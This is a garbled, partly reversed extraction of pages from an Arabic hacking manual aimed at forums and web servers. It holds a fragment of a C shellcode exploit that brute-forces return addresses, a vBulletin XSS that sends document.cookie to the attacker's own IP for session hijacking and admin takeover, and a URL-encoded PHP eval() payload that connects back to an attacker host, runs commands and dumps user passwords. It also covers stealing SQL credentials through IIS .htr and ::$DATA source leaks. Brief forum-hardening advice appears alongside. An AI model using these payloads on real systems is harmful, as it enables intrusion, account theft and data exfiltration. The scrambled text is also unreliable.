sin.(PUT_BYTES(PADSIZE_3. progress = 0. sizeof(sin)) != 0 .(signal(SIGPIPE..(sock = socket(PF_INET. 4 . i 295 .continue .s_addr .retaddr.("\\\printf(\\\"connected!\\\\n p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * (REP_SHELLCODE PADSIZE_1 + (victim.("\\\ :"\\\)PUT_STRING .s_addr = ia..("\\\()perror(\\\"connect .sin_port = htons(atoi(portp (if(!progress .(PUT_BYTES(NOPCOUNT. 0x0a.1 . 0x0d. sizeof(shellcode) .1 .((sin.(()srand(getpid . SOCK_STREAM. i < REP_POPULATOR.retaddr.repretaddr * 4) + victim. shellcode. 0 .sin_addr. inet_ntoa(ia . SIG_IGN } (for(owned = 0. PADDING_3 .p += sizeof(shellcode) .(memcpy(p.("\\\HOST_PARAM \\\"\\\\r\\\\n } (++for (i = 0. i .repzero)) + .(exit(1 { (if(!progress .retaddr += RET_ADDR_INC /* skip invalid return adresses */ ((if(memchr(&victim.return -1 { . i < REP_SHELLCODE. NOP .. (struct sockaddr *) & sin.victim. 4) || memchr(&victim.sin.("\\\ .(fflush(stdout } (if(connect(sock.sin_family = PF_INET .printf(\\\"[*] Connecting .1\\\\r\\\\nHost: \\\" .((REP_POPULATOR * (1024 + PUT_STRING(\\\"GET / HTTP/1.("\\\-PUT_STRING(\\\"X .("\\\PUT_STRING(\\\"\\\\r\\\\n { } (++for (i = 0.((printf(\\\"%s\\\\n\\\".

1.retaddr (++ for(i = 0.delta .('\\. victim. \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".(PUT_STRING(buf } (if(!shown_length . PADSIZE_2 .repretaddr. p . (unsigned int)(p .expbuf .("\\\ :"\\\)PUT_STRING } (++for (j = 0.p++ = (victim.++progress (if((progress%70) == 0 .('\\putchar(((rand()>>8)%2)? \\'P\\': \\'p .("\\\ "\\\)printf . 0 .p++ = (victim. i < 40.1.("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n .(snprintf(buf..'\\)putchar { else .(PUT_BYTES(PADSIZE_2. PADDING_2 .(snprintf(buf.(PUT_STRING(buf .retaddr >> 8) & 0xff* . sizeof(buf) .repzero.retaddr >> 16) & 0xff* . i .responses = 0 } (while (1 .(printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\". PADDING_1 .("\\\printf(\\\"\\\\n (if(bruteforce .int n . sizeof(buf) .retaddr & 0xff* .("\\\PUT_STRING(\\\"\\\\r\\\\n { .p++ = victim.("\\\-PUT_STRING(\\\"X . j . j < victim.((printf(\\\"[*] Exploit output is %u bytes\\\\n\\\". victim.(PUT_BYTES(victim.progress = 1 } (if(progress == 1 .fd_set fds .struct timeval tv 296 .shown_length = 1 { .retaddr >> 24) & 0xff* { .(PUT_BYTES(PADSIZE_1. expbuf.expbuf .(fflush(stdout .(write(sock.p++ = (victim. \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".

break (if(n >= 1 } (if(!owned } (++ for(i = 0. &fds .delta. n { { (if(!owned 297 .tv_sec = sc_timeout . victim. i < n.(write(sock. i ('\\if(buf[i] == \\'G . sizeof(buf) . delta=%d.repretaddr.tv. repretaddr=%d. buf. &fds .(fflush(stdout { else { . buf. repzero=%d\\\\n\\\". &fds.1)) < 0 .(exit(1 .(FD_SET(0. buf. n { { } ((if(FD_ISSET(0.(FD_SET(sock.("\\\ :now .type. \\\"O\\\". victim. 1 .(write(1. victim. buf.((memset(buf.repzero printf(\\\"Experts say this isn\\'t exploitable. NULL.(FD_ZERO(&fds . 0.((write(sock.owned = 1 .retaddr. sizeof(buf) .responses = 0 (if(responses >= 2 } . &fds (if((n = read(0.. retaddr=0x%lx.tv_usec = 0 .++ responses else . strlen(cmdz printf(\\\" it\\'s a TURKEY: type=%s. .1)) < 0 .(victim.tv. NULL. owned? NULL : &tv) > 0 } ((if(FD_ISSET(sock. so nothing will happen . &fds (if((n = read(sock.(write(sock. sizeof(buf } (if(select(sock + 1. cmdz. victim.

("\\\fprintf(stderr.angels-bytes.com ‫)) قد تم تجريبها وإختبارها من قبل‬ ‫وهذي وصلة تنزيل البرنامج‬ http://www.return 0 { (( ‫ قبل وضعها لكم هنا‬angels-bytes. \\\"Ooops.return -1 { { ...break { .(free(expbuf .com/?show=tools&action=info&id=19 ،،،‫انتهى‬ 298 .return 0 } (if(!bruteforce . hehehe!\\\\n .(close(sock (if(owned .

0 401 Unauthorized‬‬ ‫‪<error("<p align=right><font face=Tahoma size=2 color=Red‬ليس من حقك‬ ‫الدخول إلى هذه الصفحة>‪.exit‬‬ ‫{‬ ‫( && )‪if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN‬‬ ‫‪} ( (( "$PHP_AUTH_PW == "$PASSWORD‬‬ ‫‪."PASSWORD = "Password$‬‬ ‫‪} (function error ($error_message‬‬ ‫‪"."LOGIN = "User$‬‬ ‫‪.‫" حماية المنتديات "‬ ‫>ةةةةة<‬ ‫الكل يعرف لغة ‪ php‬و التي يصمم بها المنتديات و الكل يعرف أيضا أنها مليئة بالثغرات الكبيرة‬ ‫إليك مدير أي منتدى ) ‪ ( vb‬بعض الساسيات التي يتم بها حماية منتداك ‪/‬‬ ‫‪ً-1‬ل و قبل كل شيء المدير العام ضع مديرين إثنين واحد تكتب فيه المشاركات و تعديل المنتدى و كل شيء‬ ‫و الخر للحتياط عندما يسرق المدير العام ‪.‬‬ ‫‪-2‬مي لوحة التحكم بكلمة سر أي إفتح ملف ‪ index.("<font></p/‬‬ ‫{‬ ‫?<‬ ‫مع تغيير كلمتي‬ ‫‪User‬‬ ‫و‬ ‫‪Password‬‬ ‫‪299‬‬ .echo $error_message‬‬ ‫".(""header("WWW-Authenticate: Basic entrer="Form2txt admin‬‬ ‫‪.‬ ‫‪.("header("HTTP/1.php‬الموجود بـمجلد ‪ admin‬بواسطة المفكرة و‬ ‫أضف عليه كود كلمة السر الذي هو ‪/‬‬ ‫>?‪php‬‬ ‫‪.

‬‬ ‫‪-5‬توقيع و ما أدراك ما التوقيع ‪ ..‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق المنتديات من نوع ‪" vBulletin2..‬‬ ‫‪---------‬‬‫الثغرة ‪:‬‬ ‫‪--------‬‬‫تنقسم طريقة العمل الى عدة اقسام ‪ ..write('<img‬‬ ‫‪<src="http://my_ip_address/'+document..2.</script‬‬ ‫مع ملحظة تغير الـ ‪ IP Adress‬الى رقم الـ ‪ IP‬الخاص بك ‪..‫‪-3‬غ قائمة العضاء لماذا ؟؟ مثل لو كان لديك ‪ 3000‬عضو ووضع الزائر الكريم قائمة العضاء و قعد‬ ‫يفحط به أصبح هناك ضغط كبير على المنتدى قد تسألوني لماذا ل نلغي قائمة البحث !! لن البحث في النسخ‬ ‫الجديدة يكون بأكثر من ثلث أحرف و بهذا لن يكون هناك أي ضغط ‪.‬إجعله فقط يخدم الصور أما الفلش و الصوت فل ‪.‬‬ ‫وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في‬ ‫جهاز وقراءة جزء‬ ‫من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى ‪ .‬لكن يشترط ان يسمح المنتدى بأكواد الـ ‪.‬‬ ‫‪ -4‬تكثر فتح لغة ‪ HTML‬في المنتديات أي إفتحها بمنتدى واحد أو إثنين فقط لوجود الضرورة ‪ .‬أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل‬ ‫المنتدى يستقبل‬ ‫بيانات من مكان خاطيء ‪ .0‬‬ ‫>ةةةةة<‬ ‫‪--------‬‬‫مقدمة ‪:‬‬ ‫‪--------‬‬‫الموضوع ‪ :‬اختراق الـ ‪vBulletin‬‬ ‫المتطلبات ‪) WebServer :‬تركيب سيرفر على جهازك الشخصي( ‪ +‬متصفح انترنت )اكسبلورر( ‪.‬لماذا ؟؟‬ ‫لنه يوجد كود هتمل يفسد جميع المواضيع التي تعتمد على هذه اللغة ‪. HTML‬‬ ‫قم بكتابة موضوع جديد او رد )في منتدى يدعم الـ ‪ . ( HTML‬ثم اكتب اي موضوع والصق بين السطور‬ ‫هذا الكود ‪:‬‬ ‫>‪script>document.cookie+'">'..‬‬ ‫المستوى ‪ :‬متوسط‬ ‫ملحظة ‪ :‬هذه الطريقة لست للـ ‪ vBulletin‬فقط !! يمكن ان تجربها على انواع اخرى من المنتديات ‪.‬‬ ‫‪300‬‬ .‬ثم يقوم السكربت بتحويل هذه السطور‬ ‫الى رقم‬ ‫الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل ‪ IIS‬او ‪Apache‬‬ ‫او غيرها ( ‪.

.. +‬‬ ‫)واي منفذ يمكن من خلله وضع كود ‪ HTML‬باي صورة كانت (‬ ‫كما يجب اغل كود الـ ‪ .%20bbpassword=dd6169d68822a116cd97e1fb‬‬ ‫‪ddf90622..‬مثال ‪:‬‬ ‫‪GET/ bbuserid=86...1 .‬اين الباسورد ؟؟‬ ‫الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها ‪ .%20sessionhash=a‬‬ ‫‪4719cd620534914930b86839c4bb5f8.2... Dont' be Lamer‬‬ ‫تاريخ اكتشاف الثغرة ‪2002 .‬إلخ‬ ‫ابحث عن الكود الخاص بالباسورد ‪ ...‫وبعد ان تتم العملية بنجاح قم بفتح ملف الـ ‪ Log‬الخاص بالسيرفر الذي يحتويه جهازك ‪.‬لذا كن حذرا واغلق هذه المنافذ ‪.. IMG‬لنه ببساطة بامكانك استخدامه بدل كلمة >‪ <script‬فاذا وضعت >‪<img‬‬ ‫او >‪ <Demon‬او‬ ‫اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ‪ .‬فتاح المجلد ‪ Apche‬واختر ‪ logs‬واختر ‪..0‬وهي تعمل بنجاح ‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪301‬‬ .‬‬ ‫اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء ‪! ..php‬‬ ‫‪[bbuserid=[userid]&bbpassword=[password hash‬‬ ‫ستجد عبارة ‪ " :‬أهل بعودتك يـا ) اسم الذي سرقت منه الكوكيز‪" (.‬اذهب الى )التحكم( وقم بتعديل البريد اللكتروني الى‬ ‫بريدك الخاص‬ ‫وثم قم بتسجيل الخروج ‪ ..%20bbthreadview[54‬‬ ‫‪%20bblastvi.victim..‬‬ ‫في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى )الذي سرقت منه الكوكيز( ‪. Acces Log‬‬ ‫ستجد جميع الوامر التي طلبتها من السيرفر ‪ ... Forgot Password‬وعندها تستطيع استقبال بريد‬ ‫يحتوي باسورد الدمن ‪.‬‬ ‫‪-----------‬‬‫الحل‬ ‫‪----------‬‬‫للحماية من هذه الثغرة قم باغلق الـ ‪ HTML‬في )المنتدى ‪ +‬الرسائل الخاصة ‪ +‬التواقيع ‪ +‬التقويم‬ ‫‪( . Be Secret .1012444064=[20‬‬ ‫‪sit=1011983161‬‬ ‫فكر قليل الن ‪ .31 :‬‬ ‫تم تجربتها على الصدار ‪ 2.....‬‬ ‫لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم ‪ .‬اذن مالحل ؟‬ ‫قم بنسخ الكود الذي وجدته والصقه في المتصفح ‪ .‬ثم اذهب الى اداة ‪ .‬‬ ‫‪.‬بهذا الشكل‬ ‫?‪http://www...com/vb/index.‬‬ ‫مثال لو كان السيرفر اباتشي ‪ .

cookie)</script‬‬ ‫‪302‬‬ .org/index.vbulletin.‫"درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها"‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة ةةةةةة<‬ ‫الدرس يتكون من ‪ 7‬نقاط‬ ‫‪ 1‬المنتديات وانواعه‬ ‫‪2‬طريقة اختراقه‬ ‫‪ 3‬أختراق الــــ ‪SQL‬‬ ‫‪4‬سرفرات الويندوز ودوره في اختراق المنتديات‬ ‫‪ 5‬النسخه المنتشره في النت ودور المعربين العرب وحقيقة الموضوع وتعريبهم‬ ‫‪6‬الحمايه من المخترقين بنسبة ‪ %80‬لاجهزتكم ومنتدياتكم‬ ‫‪ 7‬المجله بجميع نسخه قابل لالختراق‬ ‫الدروس جميعها بالصورة وحقائق ودلئل‬ ‫قمت بتجميع الدروس والضافتة عليه وتعديله ‪%100‬‬ ‫ارجو عدم نقل الدروس وكوبي‬ ‫****************‬ ‫‪ 1‬المنتديات وانواعه‬ ‫المنتديات اول منتديات جون ‪ Powered by: vBulletin‬بجميع اصداراته‬ ‫‪ 1‬لماذا لم يخترق احدي منتداهم حتي الن‬ ‫‪2‬اليوجد لهم مليون عدو‬ ‫‪ 3‬اليخترقون عشرات المنتديات يوميا ولماذا ليس منتدي جون وحمايته تصل الي ‪ %60‬في السرفر‬ ‫تفضل هذا ثغرات بموقعهم اشوي شغل كمان تصل لقلبهم لاريد التطويل الن بس مثال لمن يفهمه‬ ‫?‪http://www.php‬‬ ‫‪<topic=<script>alert(document.

With an URL crafted in a certain way.php is used to fetch a template from database. there's this code 303 ./.. Unfortunately this is where vBulletin fails.php&topic=./. The bug does not involve buffer overrun or other platform-dependant issues././.1. typically "nobody".././.containing the forums and user information According to the authors the vulnerability exist in all versions of vBulletin up to 1.vbulletin.and inject arbitrary PHP code to be executed A remote user may thus execute any PHP code and programs as the web server user.org/index. The configuration files are accessible for the web server so the user can in any case access the MySQL database . The code is then passed to eval(). so it's presumably ./etc/passwd ******************** ‫طريقة اختراقه‬ ‫جميع الصدارات‬ ‫ بتذكرو يمكن بعضكم‬113 ‫فلنبدي من صفر نسخة‬ ‫ وهذا‬، ‫ وهذا النوع من المنتديات يحب يركبه قليلين الخبره في أغلب الحيان‬، ‫كلنا نعرف منتديات الفي بي‬ ‫المنتدى هو المعروف عندنا العرب بكثره‬ Jouko Pynnonen (‫الول اللي كتبته الفرنسي )على ما أعتقد‬ vBulletin (http://www.the board vBulletin templates are parsed with the eval() function.php for :an example. If we take index.exploitable under any OS or platform DETAILS ======= vBulletin templates are implemented in the following way: the gettemplate() function in global.0 beta 2. One of its key features is use of templates which allow the board administrator to dynamically modify the look of . a remote user may control the eval() parameters .. start an interactive shell and try to elevate their privilege.5 and 2. This could be somewhat safe as long as the parameters to eval() are under strict control.vbulletin...php?| =forum/view.system written in PHP..2 http://www.com/) is a commonly used web forum ..

gettemplate("faq { The dovars() function does some variable replacing. addslashes($templatename .("'"."\\\"". e.(WHERE title='".templatecache[$templatename]=$template$ { } (if ($escape==1 .("\".(template=str_replace("\"".global $templatecache. so .php? action=faq&templatecache[faq]=hello+world With this URL. you won't get the FAQ page. This array is checked for the template before doing the SQL query. but just a blank page .} ("if ($action=="faq .<"largefont> with <font size="10> :The gettemplate() function is defined in global.php } (function gettemplate($templatename. After fetching them from the database they're stored in the templatecache[] array.$DB_site } (""=![if ($templatecache[$templatename .return $template { For effectiveness the function implements a simple cache for template strings.[template=$gettemp[template$ .[template=$templatecache[$templatename$ } else { gettemp=$DB_site->query_first("SELECT template FROM template$ ."with the words "hello world The eval() call above will execute .$template$ { .a user can pass array contents in the URL.("eval("echo dovars(\"".url/index.site.g (for simplicity not %-escaped) http://www. Unfortunately the array is never initialized.(".("echo dovars("hello world 304 .$escape=1 gets a template from the db or from the local cache // . such as replace .

IP.ypass&url=hello"world :and a similar one in the Lite version http://www.IP".php3? action=simplesearch&query=searchthis&templatecache[standardredirec t]="%29%3B%24fa="<%261".fputs(%24fp.set_time_limit(substr("900".with an URL like the one above prefixed with a single quotation mark .fputs(%24fp.3). %26%24errno.if(!%24fp) {}else{%24arr[200]. so further details about exploitation aren't necessary. It doesn't take a rocket scientist to figure out how a remote user could execute arbitrary code from here.have an eval() problem with URL redirecting.0.3)). a remote user may as well pass a value containing quotation marks and other symbols.0. e..12).d%20downloads%20database.As if this wouldn't be bad enough. %24fp=fsockopen(substr("IP. in which case index.su bstr("vhak1.("echo dovars("hello"world This would produce a PHP error message due to unbalanced quotes.g http://www..if 305 .url/search. If your vBulletin board produces an error message .%26%24errstr.it's definitely vulnerable The above example works with the "Lite" version. %24va).0.0.63)). Quotation marks aren't always escaped as seen in the code above.%24va=fgets(%24fp.site.php could end up executing code like .php?acti.2).substr("90". After a little experimenting on the Jelsoft's test site I found some of the commercial versions also .0. but details may differ.url/member..s&templatecache[standardredirect]=hello"world ، ‫ تنفذ في السيرفر‬url ‫ من الكلم هذا أنت ممكن ترسل أكواد خلف‬، ‫تعرفون الكلم هذا ول داعي لترجمه‬ : ‫ جرب مثل‬، ‫ الغبيه‬hello+world ‫تضعها بدل الكلمه‬ vb 113 or 115 ‫ ركب في جهازك ملقم ويب أي ملقم تحبه ممكن تركب عليه‬-1 (‫ عندك في جهازك )طريقه فتح البورت تكون على مجازك‬90 ‫ أفتح البورت‬-2 ‫ هذا الى السيرفر‬url ‫ أرسل الـ‬-3 search.substr("900" ..IP.%20. The commercial versions are vulnerable too.0.3)).php? acti.site.or%20press%20return %20for %20command%20line" .

%24va).‬وكثير من المنتديات ‪ ،‬بهدف التحذير وليس التخريب ‪ ،‬وواضح أنه عمل بسيط‬ ‫يحتاج لشويه من التفكير ‪ ،‬أعتقد أهليز زمان صار فيه ‪ ،‬ولكن مسحت الداتالبيس وهذا سهل للغايه‬ ‫طريقه قديمه نوعا ما ‪ ،‬وحطيتها للي حب يجرب فقط !!‬ ‫وأعذروني على الملء والنحو‬ ‫ملحظه أخيره ‪ :‬وهي عند ما تشبك مع السيرفر عن طريق البورت ‪ 90‬أرسل‬ ‫‪d downloads‬‬‫تنزل لك الداتبيس كلها ‪ ،‬وللسف طلعت غير مشفره وهذا يدل على التخلف ‪ ،‬ولكن في الصداره ‪2."%24res[password].3)).strlen(%24serve‬‬ ‫‪rname)).18)).IP.‫))‪strlen(%24va)>1‬‬ ‫‪{include(substr("admin/config.‬‬ ‫‪php3".fputs(%24fp.").include(substr("admin/config.substr("select%20‬‬ ‫‪%20from%20user" .%24ir%2B%2B‬‬ ‫‪{fputs(%24fp.}die(vhak‬‬ ‫‪"finished_execution).%24arr[%24‬‬ ‫‪_ir]).IP‬هذه تحط مكانها رقم الي بي حقك ‪ ،‬ثم الحظ بعدها وجود الرقم ‪ 12‬وهذا تغيرها على‬ ‫طول رقم الي بي ‪ ،‬مثل ‪ 127.").fp‬‬ ‫‪uts(%24fp.mysql_connect(substr("%24servername".fputs(%24fp.0.16)).}}fclose(%24fp).strlen(%24dbusername)).0.0.‬‬ ‫)‪%24arr).com‬أصدقائي طبعا( من باب التنبيه ‪ ،‬وكمان صار في ‪ c4arab.%24str=exec(fgets(%24fp.0.while(%24res=mysql_fetch_array‬‬ ‫‪%20(%24curre‬‬ ‫))‪nta‬‬ ‫‪{fputs(%24fp.0..strlen(%24dbname)).0.").substr("%‬‬ ‫‪24dbpassword" ."%24res[userid].0.0.%24ir< sizeof(%24arr).echo%28‬‬ ‫‪By Kill -9‬‬ ‫لحظ ‪ IP.0.‬‬ ‫‪306‬‬ .strlen(%24dbpassword)))."%24res‬‬ ‫‪%24arr).com‬و‬ ‫طريق السلم و الثقافه ‪."%24res[usergroupid].for(%24ir=substr("0"..substr("%24dbusername".substr("128".0.php".fputs(%24fp.2x‬‬ ‫شفرت ولكن كسرتها وقريبا أقول لك عنها‬ ‫تم شرح طريقة الختراق من ‪ 113‬الي ‪11‬‬ ‫طريقة اختراق من ‪ 115‬الي ‪225‬‬ ‫المتطلبات ‪) WebServer :‬تركيب سيرفر على جهازك الشخصي( ‪ +‬متصفح انترنت )اكسبلورر( ‪.17)).IP.%24currenta=mysql_db_qu‬‬ ‫*‪ery(substr("%24dbname".0.1).1‬يكون طوله ‪9‬‬ ‫ممكن أنت تخترع كود ثاني وترسله وتلحظ أنه يتنفذ ‪ ،‬ممكن ترسل كود يسجل لك أدمين ‪ ،‬هذا مثل ما صار‬ ‫في ‪) arabteam2000.

%20sessionhash=a‬‬ ‫‪4719cd620534914930b86839c4bb5f8..com/vb/index.... ( HTML‬ثم اكتب اي موضوع والصق بين السطور‬ ‫هذا الكود ‪:‬‬ ‫>‪script>document.‬اذن مالحل ؟‬ ‫قم بنسخ الكود الذي وجدته والصقه في المتصفح ‪ .cookie+'">'.‬‬ ‫مثال لو كان السيرفر اباتشي ‪ ..‬لكن يشترط ان يسمح المنتدى بأكواد الـ ‪.php‬‬ ‫‪[bbuserid=[userid]&bbpassword=[password hash‬‬ ‫‪307‬‬ ... HTML‬‬ ‫قم بكتابة موضوع جديد او رد )في منتدى يدعم الـ ‪ .%20bbpassword=dd6169d68822a116cd97e1fb‬‬ ‫‪ddf90622.write('<img‬‬ ‫‪<src="http://my_ip_address/'+document.%20bbthreadview[54‬‬ ‫‪%20bblastvi.‫المستوى ‪ :‬متوسط‬ ‫ملحظة ‪ :‬هذه الطريقة لست للـ ‪ vBulletin‬فقط !! يمكن ان تجربها على انواع اخرى من المنتديات ‪.‬‬ ‫وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في‬ ‫جهاز وقراءة جزء‬ ‫من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى ‪ .‬فتاح المجلد ‪ Apche‬واختر ‪ logs‬واختر ‪..‬ثم يقوم السكربت بتحويل هذه السطور‬ ‫الى رقم‬ ‫الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل ‪ IIS‬او ‪Apache‬‬ ‫او غيرها ( ‪...‬إلخ‬ ‫ابحث عن الكود الخاص بالباسورد ‪ .‬بهذا الشكل‬ ‫?‪http://www.victim.1012444064=[20‬‬ ‫‪sit=1011983161‬‬ ‫فكر قليل الن ‪ .‬مثال ‪:‬‬ ‫‪GET/ bbuserid=86.‬‬ ‫‪---------‬‬‫الثغرة ‪:‬‬ ‫‪--------‬‬‫تنقسم طريقة العمل الى عدة اقسام ‪ .</script‬‬ ‫مع ملحظة تغير الـ ‪ IP Adress‬الى رقم الـ ‪ IP‬الخاص بك ‪.‬اين الباسورد ؟؟‬ ‫الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها ‪ . Acces Log‬‬ ‫ستجد جميع الوامر التي طلبتها من السيرفر ‪ ..‬‬ ‫وبعد ان تتم العملية بنجاح قم بفتح ملف الـ ‪ Log‬الخاص بالسيرفر الذي يحتويه جهازك ‪.‬أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل‬ ‫المنتدى يستقبل‬ ‫بيانات من مكان خاطيء ‪ ..

...‬اذهب الى )التحكم( وقم بتعديل البريد اللكتروني الى‬ ‫بريدك الخاص‬ ‫وثم قم بتسجيل الخروج ‪ ...‬هناك ثغرات كثير يمكن‬ ‫ان تحصل منها على كلمات المرور مثل ثغرة ‪htr..‬‬ ‫س ‪ :‬مالذي تحتاجة للدخول على قواعد بيانات ‪ SQL‬؟‬ ‫تحتاج فقط لل ‪ User Name‬و ‪Passwd‬‬ ‫س ‪ :‬من اين احصل على اسم المستخدم وكلمة المرور ؟‬ ‫هناك طرق عديدة للحصول على ‪ User name and Passwd‬منها كما اسلف صفحات ال ‪ASP‬‬ ‫وملفات اخرى من نوع *‪ sql.. Forgot Password‬وعندها تستطيع استقبال بريد‬ ‫يحتوي باسورد الدمن ‪. Administrator‬‬ ‫اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ‪.‬ثم اذهب الى اداة ‪ ..‬‬ ‫في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى )الذي سرقت منه الكوكيز( ‪.‬‬ ‫لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم ‪ .‫ستجد عبارة ‪ " :‬أهل بعودتك يـا ) اسم الذي سرقت منه الكوكيز‪" (.+‬‬ ‫كيف تستخدم هذه الثغرة ‪:‬‬ ‫‪308‬‬ ..‬‬ ‫س ‪ :‬مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات ‪ SQL‬؟‬ ‫هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ل اقصد منتديات ‪ PHP‬بل منتديات ‪ ASP‬في الغالب‬ ‫سوف تحصل على جميع اسماء‬ ‫المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلحيات لم تكن تحلم بها ‪ ،‬اما اذا كان‬ ‫الموقع يحتوي على ميزة‬ ‫قائمة المراسلت فسوف تحصل على اعداد خيالية من اليميلت ‪ ،‬عندها قم بانشاء شركة للدعاية والعلن‬ ‫وسوف تصبح ثريا اذن لتنسى ‪_LinuxRay‬‬ ‫توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص ‪ -‬ارقام هواتف ‪ -‬عناوين ‪ -‬تورايخ الميلد ‪،‬‬ ‫ممكن ان تصبح ‪..‬‬ ‫*******************‬ ‫‪ 3‬أختراق الــــ ‪SQL‬‬ ‫يمكنك استخدام برنامج العقرب بيكون اسرع لمن لديه نسخ منه‬ ‫س ‪:‬في البداية ماهي الس كيو ال ) ‪( SQL‬؟؟‬ ‫الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب‬ ‫‪ ASP‬هي صفحات تسحب بياناتها‬ ‫من قاعدة ‪ SQL‬وصفحات ‪ ASP‬ممكن ان تكون كنز من المعلومات لختراق قواعد بيانات ‪ SQL‬وهذا‬ ‫ماسوف اشير اليه لحقا ‪ ،‬و ‪SQL‬‬ ‫تتنصت على البورت ‪1433‬‬ ‫ايضا مااريد ان اخبرك به ان ال ‪ SQL‬قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على‬ ‫عدد من الجداول يمكن‬ ‫ان تتصور كبرقواعد بيانات ‪ SQL‬والعدد الكبير من البيانات التى تحتويها ‪.

asp+. line 5/‬‬ ‫هناك ملف ينتهي بامتداد *‪ inc..inc‬‬ ‫>!‪<--"include file = "database. "6666666‬‬ ‫‪<%‬‬ ‫‪-----------------------------------------------------------------‬‬‫في الكود السابق ترى ان اسم المستخدم هو _‪LinuxRay‬‬ ‫وكلمة السر هي ‪6666666‬‬ ‫‪------------------------------------------------------------------‬‬ ‫الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ‪ ASP‬مثل التي ‪:‬‬ ‫‪'AMicrosoft VBScript runtime error '800a01a8‬‬ ‫‪'Object required: 'Conn‬‬ ‫‪filename.asa‬‬ ‫‪309‬‬ .+‬الثغرة‬ ‫هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف ‪ .DATABASE=moe_dbs".SERVER=xxx.htr‬‬ ‫‪ : target‬الموقع الهدف‬ ‫‪ : Page‬صفحة ‪asp‬‬ ‫‪ : htr.PWD=.CreateObject("ADODB..‬هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم‬ ‫المستخدم وكلمة المرور‬ ‫اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع ‪. "_LinuxRay".‫‪http://target/page.inc.inc#--‬‬ ‫وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات‬ ‫‪global.APP=Microsoft (R) Developer‬‬ ‫‪"Studio..UID=sa.Connection‬‬ ‫‪DB.WSID=xxx.‬‬ ‫وممكن ان ترى مثل هذا المر في صفحة ‪ASP‬‬ ‫عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف ‪database.Open "DRIVER=SQL‬‬ ‫‪Server.‬اعرف انك سوف تتساءل مالفائدة‬ ‫اذن منها الفائدة هو‬ ‫خلف هذه الصفحة البيضاء اذهب الى ‪ View Source‬لكي ترى اوامر البرمجة الخاصة ب ‪ ASP‬التى‬ ‫ليمكن لك ان تراها في الوضع العادي ‪ :‬مثل‬ ‫>‪%‬‬ ‫‪("Set DB= Server.

asa+.‬‬ ‫سيظهر لك مربع لنشاء الملف اختر‬ ‫‪Create‬‬ ‫اي انشاء‬ ‫الن سترى مربع‬ ‫‪Data Link Properties‬‬ ‫تحتاج فقط لثلث معلومات اسم الموقع او الي بي ‪ -‬اسم المستخدم ‪ -‬كلمة المرور‬ ‫‪ .0‬لكني مازلت افضل‬ ‫استخدام البرنامج السهل ‪ACCESS 2000‬‬ ‫كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة‬ ‫‪File‬‬ ‫اختر‬ ‫‪New‬‬ ‫ومن قائمة الملفات الجديدة اختار‬ ‫‪(Project (Exiting Data‬‬ ‫اي مشروع قاعدة بيانات موجودة ‪.asa‬‬ ‫ليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين ‪SQL‬‬ ‫وكل ماعليك فعله ان تكتب اسم الصفحة مثل التي ‪:‬‬ ‫‪global.sql‬‬ ‫‪global-direct.1‬ادخل اسم الموقع في صندوق ‪Select or enter server name‬‬ ‫‪ ..2‬اسم المستخدم في ‪User Name‬‬ ‫‪ ..asa‬‬ ‫‪global.htr‬‬ ‫هناك ثغرة قديمة في ‪ IIS 3‬وهي ان تضيف بعد صفحة ‪ ASP‬هذا الرمز ‪ data$::‬كما يلي‬ ‫‪file.‬ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟‬ ‫بعدها الدخول على قاعدة ال ‪!! SQL‬‬ ‫هناك عدة برامج تدخل على قاعدة البينات انا استخدم ‪ Visual interdev 6.asa‬‬‫‪milion.asa++‬‬ ‫‪beforemilion-global.asp::$data‬‬ ‫هذه الثغرة لتعمل ال على ‪ IIS 3‬فل تتعب نفسك بتطبيقها فقط 